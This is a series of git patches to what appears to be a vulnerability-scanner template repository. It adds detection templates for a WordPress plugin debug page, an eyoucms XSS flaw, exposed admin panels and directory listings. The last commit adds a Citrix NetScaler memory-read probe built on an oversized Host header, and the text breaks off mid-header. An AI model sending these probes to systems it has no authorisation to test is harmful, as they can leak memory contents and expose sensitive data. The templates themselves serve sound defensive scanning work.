- "{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + condition: and \ No newline at end of file From 2d2def47cffdf733534674ba9961808576c8f881 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 16:39:45 +0000 Subject: [PATCH 0616/1768] Auto Generated New Template Addition List [Mon May 6 16:39:45 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9293c69f1c..3f504d84d3 100644 --- a/.new-additions +++ b/.new-additions @@ -36,6 +36,7 @@ http/exposed-panels/cassia-bluetooth-gateway-panel.yaml http/exposed-panels/cyberchef-panel.yaml http/exposed-panels/femtocell-panel.yaml http/exposed-panels/monitorr-panel.yaml +http/exposed-panels/openwebui-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml From 3cb52eed5558136281070ccf45cf2877c912259d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 16:39:49 +0000 Subject: [PATCH 0617/1768] Auto Generated Templates Checksum [Mon May 6 16:39:49 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 99c3ea8948..96de62cd8b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3161,7 +3161,7 @@ http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 -http/cves/2023/CVE-2023-44812.yaml:12a4e456df2811c0776d971726c78345b1c1c185 +http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 @@ -4562,7 +4562,7 @@ http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 -http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b +http/exposures/backups/settings-php-files.yaml:618a28db7b7adcf9b4a8e6f12b3e7047a9162638 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 @@ -7668,7 +7668,7 @@ http/vulnerabilities/other/graylog-log4j.yaml:78b153f3d47c871e1b5ed10e05d4e34445 http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c76b099 http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8 http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823 -http/vulnerabilities/other/gz-forum-script-xss.yaml:0766b13af3eeaf324edb042b69588a8e02d937f2 +http/vulnerabilities/other/gz-forum-script-xss.yaml:db00639891f547d4593e86bff6a7b6f07c8a1363 http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml:185ebc9353c39517c1963b7755f565f8d2b0ccbb http/vulnerabilities/other/h3c-imc-rce.yaml:2cbd69391843e97f2f3637a982c5ce0314b496bb http/vulnerabilities/other/hanming-lfr.yaml:511265b7bf1fb863ed2ae2d4d1551af5aa110a71 @@ -8479,7 +8479,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5201eedf84b2eae1584f081e861dff42e5d421b6 +templates-checksum.txt:c0a7e8d634224cfd05eda525edebb0b1858a6f26 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f4df5141019b6f1a7298807d35a8cdf0ccaa6c2d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 16:40:34 +0000 Subject: [PATCH 0618/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c0a142d9c5..752566410e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/exposed-panels/cyberchef-panel.yaml' - 'http/exposed-panels/femtocell-panel.yaml' - 'http/exposed-panels/monitorr-panel.yaml' + - 'http/exposed-panels/openwebui-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' From 2b6b55cdd990fa136732f5fd1c89c1bb4e227e0f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 16:41:31 +0000 Subject: [PATCH 0619/1768] Auto Template Signing [Mon May 6 16:41:31 UTC 2024] :robot: --- http/exposed-panels/openwebui-panel.yaml | 1 + http/exposures/backups/settings-php-files.yaml | 2 +- http/vulnerabilities/other/gz-forum-script-xss.yaml | 3 +-- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/openwebui-panel.yaml b/http/exposed-panels/openwebui-panel.yaml index 24d715f163..2d0e3c48b8 100644 --- a/http/exposed-panels/openwebui-panel.yaml +++ b/http/exposed-panels/openwebui-panel.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022048aa2d97cb641c772a571a2a22c80a72ab6ecde248ac954dd98c6f0c6d5c132a022028396fa47061b9bf3c01e83d1c68f4ecfe3b48e213c90ef7fd1d60e78dfd3106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/backups/settings-php-files.yaml b/http/exposures/backups/settings-php-files.yaml index d719a87f76..d7977629f6 100644 --- a/http/exposures/backups/settings-php-files.yaml +++ b/http/exposures/backups/settings-php-files.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eba9de4436d8e08669f91da6cbd54d44279778bcf9fec5b5e930a1d6b5f8e56e022100a11699b4af7715f48e25cc159b1709c6396bf4ae8be69c37d82a477bc75689f5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bfdece869f625f103aa1abf3d734cc9c383709e5ee0cceaf35396893fbf45db8022100f0cd8e024f5a399219c954b811b55195a197848196c3b7c610d984e30f03cfda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/gz-forum-script-xss.yaml b/http/vulnerabilities/other/gz-forum-script-xss.yaml index df119d50cf..961c1afa08 100644 --- a/http/vulnerabilities/other/gz-forum-script-xss.yaml +++ b/http/vulnerabilities/other/gz-forum-script-xss.yaml @@ -26,5 +26,4 @@ http: - 'contains(body, ">") && contains(body, "New Topic")' - 'contains(content_type, "text/html")' condition: and - -# digest: 4a0a004730450221009c6ff6f5b059c822eaf5fc7399b0fcfc8b4b8ab99bdf3d5541bcbac5591ccaca022066329ee7e27e760f069414e1cd4d583f8bb56bfa9981f1a24fd31f24421711a9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a8c54695560c315e38751b221c77539e1614299bcaad0046383880c77e8fca0b022036a2cf634429cbab82c74c9633e30a0d31b3acb8babf044601ef51816fdbf453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a09a05107753aedbcfc14a43740258ce54716384 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 6 May 2024 22:11:40 +0530 Subject: [PATCH 0620/1768] minor update --- http/cves/2024/CVE-2024-22927.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index c6630c9477..28b3db3f0a 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -37,7 +37,7 @@ http: - type: word part: body words: - - 'name="num" value="1">' + - 'name="num" value="1">' - 'id="eytime"' condition: and From 1769d8867c40904ba45d58f2db2a22d768999939 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 16:49:29 +0000 Subject: [PATCH 0621/1768] Auto Generated Templates Checksum [Mon May 6 16:49:29 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 96de62cd8b..5c2152b8e1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3247,6 +3247,7 @@ http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb +http/cves/2024/CVE-2024-22927.yaml:bbbdb360406e25573f485ac8dc95664fc880d53b http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 @@ -4133,7 +4134,7 @@ http/exposed-panels/openvpn-connect.yaml:92b51be8820e8d19dcab982f32e889e0ac84fc0 http/exposed-panels/openvpn-monitor.yaml:8bdcaa711f6852aeae49b0dde458dd17ed94f146 http/exposed-panels/openvpn-router-management.yaml:4c372e21e9ecc176fd0e9edd4fa3195012d17bbf http/exposed-panels/openvz-web-login.yaml:37b140070fa9fc0fc6ff0b5d95fbb7b6dd660aa6 -http/exposed-panels/openwebui-panel.yaml:b9564ac8cb5097946e5c7fd4975be56fe1006380 +http/exposed-panels/openwebui-panel.yaml:796f6949f34bdd706906d64b112519415f6cf396 http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8ef54ad683c06 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 @@ -4562,7 +4563,7 @@ http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 -http/exposures/backups/settings-php-files.yaml:618a28db7b7adcf9b4a8e6f12b3e7047a9162638 +http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 @@ -7668,7 +7669,7 @@ http/vulnerabilities/other/graylog-log4j.yaml:78b153f3d47c871e1b5ed10e05d4e34445 http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c76b099 http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8 http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823 -http/vulnerabilities/other/gz-forum-script-xss.yaml:db00639891f547d4593e86bff6a7b6f07c8a1363 +http/vulnerabilities/other/gz-forum-script-xss.yaml:4f9e19fc198666441fc949361b7e2815bb7e3622 http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml:185ebc9353c39517c1963b7755f565f8d2b0ccbb http/vulnerabilities/other/h3c-imc-rce.yaml:2cbd69391843e97f2f3637a982c5ce0314b496bb http/vulnerabilities/other/hanming-lfr.yaml:511265b7bf1fb863ed2ae2d4d1551af5aa110a71 @@ -8479,7 +8480,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c0a7e8d634224cfd05eda525edebb0b1858a6f26 +templates-checksum.txt:5df245c5d08dbb638d47953c88b039d8490785ba wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d878bfdd091eea772954ed5a27f2f19b8e50a567 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 16:49:30 +0000 Subject: [PATCH 0622/1768] Auto Generated cves.json [Mon May 6 16:49:30 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 423775d2f0..1f0da01659 100644 --- a/cves.json +++ b/cves.json @@ -2353,6 +2353,7 @@ {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"} {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} +{"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 38bc006309..9332b13391 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -ea5ada70ef2729a28e421170bbcd8e9c +56b04172c1df6906eb35bc5859e652a2 From a102b7129865effae47e0f18b78dd701bc85ced8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 16:51:15 +0000 Subject: [PATCH 0623/1768] Auto Template Signing [Mon May 6 16:51:15 UTC 2024] :robot: --- http/cves/2024/CVE-2024-22927.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index 28b3db3f0a..e0131eacea 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220478cf55dd8920fb6cef6048870359141244744e6fd3b3fa26652c5c3440ee8080220629a2ff1f955e8ad2147df65ebc9b82b067fbdc5cb27ebbf650f8106928ed172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a6ed55cdd2013cb69cd4896fc487bfb8e79d7e72 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 6 May 2024 22:56:22 +0530 Subject: [PATCH 0624/1768] minor update --- http/exposed-panels/rdweb-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/rdweb-panel.yaml b/http/exposed-panels/rdweb-panel.yaml index 59b76badf9..828870f3d7 100644 --- a/http/exposed-panels/rdweb-panel.yaml +++ b/http/exposed-panels/rdweb-panel.yaml @@ -24,7 +24,7 @@ http: - '{{BaseURL}}/RDWeb/' host-redirects: true - max-redirects: 1 + max-redirects: 2 matchers-condition: or matchers: @@ -35,7 +35,7 @@ http: - type: word part: response - condition: and words: - "" - "Microsoft Remote Desktop" + condition: and From 124086fe323035a56e0ff8da07e7a0a7f63c3fb1 Mon Sep 17 00:00:00 2001 From: theMiddleBlue Date: Mon, 6 May 2024 20:04:28 +0200 Subject: [PATCH 0625/1768] feat: new directory listing template --- http/miscellaneous/directory-listing.yaml | 90 +++++++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 http/miscellaneous/directory-listing.yaml diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml new file mode 100644 index 0000000000..f133186781 --- /dev/null +++ b/http/miscellaneous/directory-listing.yaml @@ -0,0 +1,90 @@ +id: directory-listing + +info: + name: Directory Listing Enabled + author: theMiddle + severity: low + description: Directory Indexing is a web server feature that allows the contents of a directory to be displayed when no index file is present. This can be a security risk as it can expose sensitive files, old backup or unreferenced files. + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information + - https://portswigger.net/kb/issues/00600100_directory-listing + tags: miscellaneous,misc,generic,misconfguration,web + +flow: | + function target_is_in_scope(url) { + if (url.startsWith(template.http_1_host) || url.startsWith("/")) { + return true; + } + return false; + } + + http(1); + + if(template.links) { + var path_checked = []; + var paths = []; + + for(i=0; iIndex of" + part: body From dd5224cb5f572262f9a075e001dba586fd21fd35 Mon Sep 17 00:00:00 2001 From: theMiddleBlue Date: Mon, 6 May 2024 20:28:36 +0200 Subject: [PATCH 0626/1768] fix: trailing spaces --- http/miscellaneous/directory-listing.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index f133186781..b183a7f32e 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -23,14 +23,14 @@ flow: | if(template.links) { var path_checked = []; var paths = []; - + for(i=0; i Date: Tue, 7 May 2024 00:01:23 +0530 Subject: [PATCH 0627/1768] matcher update --- http/cves/2024/CVE-2024-33575.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index f95ac77187..57fdd9c388 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -22,7 +22,8 @@ info: vendor: User Meta product: User Meta framework: wordpress - tags: exposure,wordpress,usermeta,cve2024,wpscan + publicwww-query: "/wp-content/plugins/user-meta/" + tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak http: - method: GET @@ -32,6 +33,6 @@ http: matchers: - type: dsl dsl: - - 'status_code == 200' - - 'contains(content_type, "text/html")' - condition: and \ No newline at end of file + - 'status_code == 200' + - 'contains(body, "um-debug
")' + condition: and From c6da45657bfb02cb43df92d25388a4f9f304b5a1 Mon Sep 17 00:00:00 2001 From: Ice3man Date: Mon, 6 May 2024 18:40:18 +0000 Subject: [PATCH 0628/1768] added citrix OOB memory read template --- .../citrix/citrix-oob-memory-read.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/vulnerabilities/citrix/citrix-oob-memory-read.yaml diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml new file mode 100644 index 0000000000..bae6d3c0ce --- /dev/null +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -0,0 +1,30 @@ +id: citrix-oob-memory-read + +info: + name: Citrix Netscaler ADC and Gateway, Version 13.1-50.23 Out-Of-Bounds Memory Read + author: ice3man + severity: critical + references: + - https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory + metadata: + shodan-query: http.favicon.hash:-1292923998,-1166125415 + +http: + - raw: + - |+ + GET /nf/auth/startwebview.do HTTP/1.1 + Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA